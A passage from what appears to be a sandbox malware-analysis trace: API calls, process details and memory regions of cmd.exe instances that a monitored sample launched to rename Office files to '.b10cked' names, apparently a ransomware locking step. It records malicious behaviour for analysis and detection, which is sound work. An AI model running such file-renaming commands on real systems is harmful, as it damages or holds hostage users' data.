(in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x18e7d4, lpData=0x18e7d8, lpcbData=0x18e7d0*=0x1000 | out: lpType=0x18e7d4*=0x0, lpData=0x18e7d8*=0x40, lpcbData=0x18e7d0*=0x1000) returned 0x2 [0172.313] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x18e7d4, lpData=0x18e7d8, lpcbData=0x18e7d0*=0x1000 | out: lpType=0x18e7d4*=0x4, lpData=0x18e7d8*=0x1, lpcbData=0x18e7d0*=0x4) returned 0x0 [0172.313] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x18e7d4, lpData=0x18e7d8, lpcbData=0x18e7d0*=0x1000 | out: lpType=0x18e7d4*=0x0, lpData=0x18e7d8*=0x1, lpcbData=0x18e7d0*=0x1000) returned 0x2 [0172.313] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x18e7d4, lpData=0x18e7d8, lpcbData=0x18e7d0*=0x1000 | out: lpType=0x18e7d4*=0x4, lpData=0x18e7d8*=0x0, lpcbData=0x18e7d0*=0x4) returned 0x0 [0172.313] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x18e7d4, lpData=0x18e7d8, lpcbData=0x18e7d0*=0x1000 | out: lpType=0x18e7d4*=0x4, lpData=0x18e7d8*=0x9, lpcbData=0x18e7d0*=0x4) returned 0x0 [0172.313] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x18e7d4, lpData=0x18e7d8, lpcbData=0x18e7d0*=0x1000 | out: lpType=0x18e7d4*=0x4, lpData=0x18e7d8*=0x9, lpcbData=0x18e7d0*=0x4) returned 0x0 [0172.313] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x18e7d4, lpData=0x18e7d8, lpcbData=0x18e7d0*=0x1000 | out: lpType=0x18e7d4*=0x0, lpData=0x18e7d8*=0x9, lpcbData=0x18e7d0*=0x1000) returned 0x2 [0172.313] RegCloseKey (hKey=0x40) returned 0x0 [0172.313] time (in: timer=0x0 | out: timer=0x0) returned 0x5b886388 [0172.313] srand (_Seed=0x5b886388) [0172.313] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\OUTLLI~2.TRX\" \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\OUTLLIBR.REST.trx_dll.b10cked\"" [0172.313] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\OUTLLI~2.TRX\" \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\OUTLLIBR.REST.trx_dll.b10cked\"" [0172.314] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0172.314] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x351978, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe")) returned 0x1b [0172.314] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0172.314] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0172.314] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0172.314] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0172.314] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0172.314] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0172.314] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0172.314] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0172.314] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0172.314] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0172.314] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0172.314] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0172.314] GetEnvironmentStringsW () returned 0x352368* [0172.314] FreeEnvironmentStringsW (penv=0x352368) returned 1 [0172.315] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0172.315] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0172.315] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0172.315] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0172.315] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0172.315] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0172.315] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0172.315] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0172.315] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0172.315] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0172.315] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x18f598 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0172.315] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", nBufferLength=0x104, lpBuffer=0x18f598, lpFilePart=0x18f594 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop", lpFilePart=0x18f594*="Desktop") returned 0x18 [0172.315] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0172.315] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x18f314 | out: lpFindFileData=0x18f314) returned 0x3509f8 [0172.315] FindClose (in: hFindFile=0x3509f8 | out: hFindFile=0x3509f8) returned 1 [0172.315] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5", lpFindFileData=0x18f314 | out: lpFindFileData=0x18f314) returned 0x3509f8 [0172.315] FindClose (in: hFindFile=0x3509f8 | out: hFindFile=0x3509f8) returned 1 [0172.315] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", lpFindFileData=0x18f314 | out: lpFindFileData=0x18f314) returned 0x3509f8 [0172.316] FindClose (in: hFindFile=0x3509f8 | out: hFindFile=0x3509f8) returned 1 [0172.316] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0172.316] SetCurrentDirectoryW (lpPathName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 1 [0172.316] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\EEBsYm5\\Desktop") returned 1 [0172.316] GetEnvironmentStringsW () returned 0x350218* [0172.316] FreeEnvironmentStringsW (penv=0x350218) returned 1 [0172.316] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0172.316] GetConsoleOutputCP () returned 0x1b5 [0172.317] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0172.317] GetUserDefaultLCID () returned 0x409 [0172.317] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x4a9e4950, cchData=8 | out: lpLCData=":") returned 2 [0172.317] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x18f6d8, cchData=128 | out: lpLCData="0") returned 2 [0172.317] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x18f6d8, cchData=128 | out: lpLCData="0") returned 2 [0172.317] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x18f6d8, cchData=128 | out: lpLCData="1") returned 2 [0172.317] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x4a9e4940, cchData=8 | out: lpLCData="/") returned 2 [0172.317] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x4a9e4d80, cchData=32 | out: lpLCData="Mon") returned 4 [0172.317] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x4a9e4d40, cchData=32 | out: lpLCData="Tue") returned 4 [0172.317] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x4a9e4d00, cchData=32 | out: lpLCData="Wed") returned 4 [0172.317] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x4a9e4cc0, cchData=32 | out: lpLCData="Thu") returned 4 [0172.318] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x4a9e4c80, cchData=32 | out: lpLCData="Fri") returned 4 [0172.318] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x4a9e4c40, cchData=32 | out: lpLCData="Sat") returned 4 [0172.318] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x4a9e4c00, cchData=32 | out: lpLCData="Sun") returned 4 [0172.318] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x4a9e4930, cchData=8 | out: lpLCData=".") returned 2 [0172.318] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x4a9e4920, cchData=8 | out: lpLCData=",") returned 2 [0172.318] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0172.319] GetConsoleTitleW (in: lpConsoleTitle=0x340938, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0172.319] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0172.319] GetProcAddress (hModule=0x76910000, lpProcName="CopyFileExW") returned 0x7694ac6c [0172.319] GetProcAddress (hModule=0x76910000, lpProcName="IsDebuggerPresent") returned 0x76953ea8 [0172.319] GetProcAddress (hModule=0x76910000, lpProcName="SetConsoleInputExeNameW") returned 0x76962732 [0172.320] _wcsicmp (_String1="move", _String2=")") returned 68 [0172.320] _wcsicmp (_String1="FOR", _String2="move") returned -7 [0172.320] _wcsicmp (_String1="FOR/?", _String2="move") returned -7 [0172.320] _wcsicmp (_String1="IF", _String2="move") returned -4 [0172.320] _wcsicmp (_String1="IF/?", _String2="move") returned -4 [0172.320] _wcsicmp (_String1="REM", _String2="move") returned 5 [0172.320] _wcsicmp (_String1="REM/?", _String2="move") returned 5 [0172.323] GetConsoleTitleW (in: lpConsoleTitle=0x18f3d0, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0172.323] _wcsicmp (_String1="move", _String2="DIR") returned 9 [0172.323] _wcsicmp (_String1="move", _String2="ERASE") returned 8 [0172.323] _wcsicmp (_String1="move", _String2="DEL") returned 9 [0172.323] _wcsicmp (_String1="move", _String2="TYPE") returned -7 [0172.323] _wcsicmp (_String1="move", _String2="COPY") returned 10 [0172.324] _wcsicmp (_String1="move", _String2="CD") returned 10 [0172.324] _wcsicmp (_String1="move", _String2="CHDIR") returned 10 [0172.324] _wcsicmp (_String1="move", _String2="RENAME") returned -5 [0172.324] _wcsicmp (_String1="move", _String2="REN") returned -5 [0172.324] _wcsicmp (_String1="move", _String2="ECHO") returned 8 [0172.324] _wcsicmp (_String1="move", _String2="SET") returned -6 [0172.324] _wcsicmp (_String1="move", _String2="PAUSE") returned -3 [0172.324] _wcsicmp (_String1="move", _String2="DATE") returned 9 [0172.324] _wcsicmp (_String1="move", _String2="TIME") returned -7 [0172.324] _wcsicmp (_String1="move", _String2="PROMPT") returned -3 [0172.324] _wcsicmp (_String1="move", _String2="MD") returned 11 [0172.324] _wcsicmp (_String1="move", _String2="MKDIR") returned 4 [0172.324] _wcsicmp (_String1="move", _String2="RD") returned -5 [0172.324] _wcsicmp (_String1="move", _String2="RMDIR") returned -5 [0172.324] _wcsicmp (_String1="move", _String2="PATH") returned -3 [0172.324] _wcsicmp (_String1="move", _String2="GOTO") returned 6 [0172.324] _wcsicmp (_String1="move", _String2="SHIFT") returned -6 [0172.324] _wcsicmp (_String1="move", _String2="CLS") returned 10 [0172.324] _wcsicmp (_String1="move", _String2="CALL") returned 10 [0172.324] _wcsicmp (_String1="move", _String2="VERIFY") returned -9 [0172.324] _wcsicmp (_String1="move", _String2="VER") returned -9 [0172.324] _wcsicmp (_String1="move", _String2="VOL") returned -9 [0172.324] _wcsicmp (_String1="move", _String2="EXIT") returned 8 [0172.324] _wcsicmp (_String1="move", _String2="SETLOCAL") returned -6 [0172.324] _wcsicmp (_String1="move", _String2="ENDLOCAL") returned 8 [0172.324] _wcsicmp (_String1="move", _String2="TITLE") returned -7 [0172.324] _wcsicmp (_String1="move", _String2="START") returned -6 [0172.324] _wcsicmp (_String1="move", _String2="DPATH") returned 9 [0172.324] _wcsicmp (_String1="move", _String2="KEYS") returned 2 [0172.324] _wcsicmp (_String1="move", _String2="MOVE") returned 0 [0172.326] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0172.326] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0172.326] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x18f18c, nVolumeNameSize=0x104, lpVolumeSerialNumber=0x18f184, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x18f184*=0x90c08a66, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0172.326] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0172.326] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0172.326] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0172.326] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0172.326] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0172.326] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0172.327] _wcsnicmp (_String1="COPYCMD", _String2="FP_NO_H", _MaxCount=0x7) returned -3 [0172.327] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0172.327] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0172.327] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0172.327] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0172.327] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0172.327] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0172.327] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0172.327] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0172.327] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0172.327] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0172.327] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0172.327] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0172.327] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0172.327] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0172.327] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0172.327] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0172.327] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0172.327] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0172.327] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0172.327] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0172.327] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0172.327] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0172.327] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0172.327] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0172.327] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0172.328] _wcsnicmp (_String1="/Y", _String2="/Y", _MaxCount=0x2) returned 0 [0172.328] _wcsicmp (_String1="OUTLLI~2.TRX", _String2=".") returned 65 [0172.328] _wcsicmp (_String1="OUTLLI~2.TRX", _String2="..") returned 65 [0172.328] GetFileAttributesW (lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\OUTLLI~2.TRX" (normalized: "c:\\users\\alluse~1\\micros~1\\office\\uicapt~1\\3082\\outlli~2.trx")) returned 0x2020 [0172.622] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x351f28 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0172.623] SetErrorMode (uMode=0x0) returned 0x0 [0172.629] SetErrorMode (uMode=0x1) returned 0x0 [0172.629] GetFullPathNameW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\OUTLLI~2.TRX", nBufferLength=0x104, lpBuffer=0x18eb14, lpFilePart=0x18eafc | out: lpBuffer="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\OUTLLI~2.TRX", lpFilePart=0x18eafc*="OUTLLI~2.TRX") returned 0x3c [0172.629] SetErrorMode (uMode=0x0) returned 0x1 [0172.629] GetFileAttributesW (lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082" (normalized: "c:\\users\\alluse~1\\micros~1\\office\\uicapt~1\\3082")) returned 0x2012 [0172.629] _wcsicmp (_String1="OUTLLI~2.TRX", _String2=".") returned 65 [0172.629] _wcsicmp (_String1="OUTLLI~2.TRX", _String2="..") returned 65 [0172.629] GetFileAttributesW (lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\OUTLLI~2.TRX" (normalized: "c:\\users\\alluse~1\\micros~1\\office\\uicapt~1\\3082\\outlli~2.trx")) returned 0x2020 [0172.629] SetErrorMode (uMode=0x0) returned 0x0 [0172.630] SetErrorMode (uMode=0x1) returned 0x0 [0172.630] GetFullPathNameW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\OUTLLI~2.TRX", nBufferLength=0x104, lpBuffer=0x18ef90, lpFilePart=0x18ed28 | out: lpBuffer="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\OUTLLI~2.TRX", lpFilePart=0x18ed28*="OUTLLI~2.TRX") returned 0x3c [0172.630] SetErrorMode (uMode=0x0) returned 0x1 [0172.630] SetErrorMode (uMode=0x0) returned 0x0 [0172.630] SetErrorMode (uMode=0x1) returned 0x0 [0172.630] GetFullPathNameW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\OUTLLIBR.REST.trx_dll.b10cked", nBufferLength=0x104, lpBuffer=0x18f198, lpFilePart=0x18ed28 | out: lpBuffer="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\OUTLLIBR.REST.trx_dll.b10cked", lpFilePart=0x18ed28*="OUTLLIBR.REST.trx_dll.b10cked") returned 0x4d [0172.630] SetErrorMode (uMode=0x0) returned 0x1 [0172.630] SetLastError (dwErrCode=0x0) [0172.630] GetFileAttributesW (lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\OUTLLIBR.REST.trx_dll.b10cked" (normalized: "c:\\users\\alluse~1\\micros~1\\office\\uicapt~1\\3082\\outllibr.rest.trx_dll.b10cked")) returned 0xffffffff [0172.630] GetLastError () returned 0x2 [0172.630] FindFirstFileExW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\OUTLLI~2.TRX", fInfoLevelId=0x1, lpFindFileData=0x18e6a4, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x18e6a4) returned 0x352138 [0172.630] FindNextFileW (in: hFindFile=0x352138, lpFindFileData=0x18e6a4 | out: lpFindFileData=0x18e6a4) returned 0 [0172.631] GetLastError () returned 0x12 [0172.631] FindClose (in: hFindFile=0x352138 | out: hFindFile=0x352138) returned 1 [0172.632] FindFirstFileExW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\OUTLLI~2.TRX", fInfoLevelId=0x1, lpFindFileData=0x351cc8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x351cc8) returned 0x352138 [0172.632] GetFullPathNameW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\OUTLLIBR.REST.trx_dll.b10cked", nBufferLength=0x104, lpBuffer=0x18e93c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\OUTLLIBR.REST.trx_dll.b10cked", lpFilePart=0x0) returned 0x4d [0172.632] GetFullPathNameW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\OUTLLIBR.REST.trx_dll", nBufferLength=0x104, lpBuffer=0x18e93c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\OUTLLIBR.REST.trx_dll", lpFilePart=0x0) returned 0x45 [0172.632] GetFileAttributesW (lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\OUTLLIBR.REST.trx_dll" (normalized: "c:\\users\\alluse~1\\micros~1\\office\\uicapt~1\\3082\\outllibr.rest.trx_dll")) returned 0x2020 [0172.632] MoveFileExW (lpExistingFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\OUTLLIBR.REST.trx_dll" (normalized: "c:\\users\\alluse~1\\micros~1\\office\\uicapt~1\\3082\\outllibr.rest.trx_dll"), lpNewFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\OUTLLIBR.REST.trx_dll.b10cked" (normalized: "c:\\users\\alluse~1\\micros~1\\office\\uicapt~1\\3082\\outllibr.rest.trx_dll.b10cked"), dwFlags=0x3) returned 1 [0172.633] FindClose (in: hFindFile=0x352138 | out: hFindFile=0x352138) returned 1 [0172.633] _vsnwprintf (in: _Buffer=0x4a9e5040, _BufferCount=0x103, _Format="%9d", _ArgList=0x18e8f0 | out: _Buffer=" 1") returned 9 [0172.633] _get_osfhandle (_FileHandle=1) returned 0x7 [0172.633] GetFileType (hFile=0x7) returned 0x2 [0172.633] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0172.633] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x18e87c | out: lpMode=0x18e87c) returned 1 [0172.633] _get_osfhandle (_FileHandle=1) returned 0x7 [0172.633] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x18e8b0 | out: lpConsoleScreenBufferInfo=0x18e8b0) returned 1 [0172.633] FormatMessageW (in: dwFlags=0x1a00, lpSource=0x0, dwMessageId=0x236e, dwLanguageId=0x0, lpBuffer=0x4a9f4640, nSize=0x2000, Arguments=0x0 | out: lpBuffer="%1 file(s) moved.\r\n") returned 0x13 [0172.634] FormatMessageW (in: dwFlags=0x1800, lpSource=0x0, dwMessageId=0x236e, dwLanguageId=0x0, lpBuffer=0x4a9f4640, nSize=0x2000, Arguments=0x18e8f0 | out: lpBuffer=" 1 file(s) moved.\r\n") returned 0x1a [0172.634] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x4a9f4640*, nNumberOfCharsToWrite=0x1a, lpNumberOfCharsWritten=0x18e8d4, lpReserved=0x0 | out: lpBuffer=0x4a9f4640*, lpNumberOfCharsWritten=0x18e8d4*=0x1a) returned 1 [0172.634] _get_osfhandle (_FileHandle=1) returned 0x7 [0172.634] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0172.634] _get_osfhandle (_FileHandle=1) returned 0x7 [0172.634] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0172.634] _get_osfhandle (_FileHandle=0) returned 0x3 [0172.634] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0172.634] SetConsoleInputExeNameW () returned 0x1 [0172.634] GetConsoleOutputCP () returned 0x1b5 [0172.634] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0172.634] SetThreadUILanguage (LangId=0x0) returned 0x409 [0172.635] exit (_Code=0) Process: id = "295" image_name = "cmd.exe" filename = "c:\\windows\\system32\\cmd.exe" page_root = "0x7ea16920" os_pid = "0x848" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "9" os_parent_pid = "0xaec" cmd_line = "\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\OUTLWV~1.TRX\" \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\OUTLWVW.DLL.trx_dll.b10cked\"" cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 23007 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 23008 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 23009 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 23010 start_va = 0x1b0000 end_va = 0x2affff entry_point = 0x0 region_type = private name = "private_0x00000000001b0000" filename = "" Region: id = 23011 start_va = 0x4a9c0000 end_va = 0x4aa0bfff entry_point = 0x4a9c0000 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\System32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe") Region: id = 23012 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 23013 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 23014 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 23015 start_va = 0x7ffd8000 end_va = 0x7ffd8fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd8000" filename = "" Region: id = 23016 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 23369 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 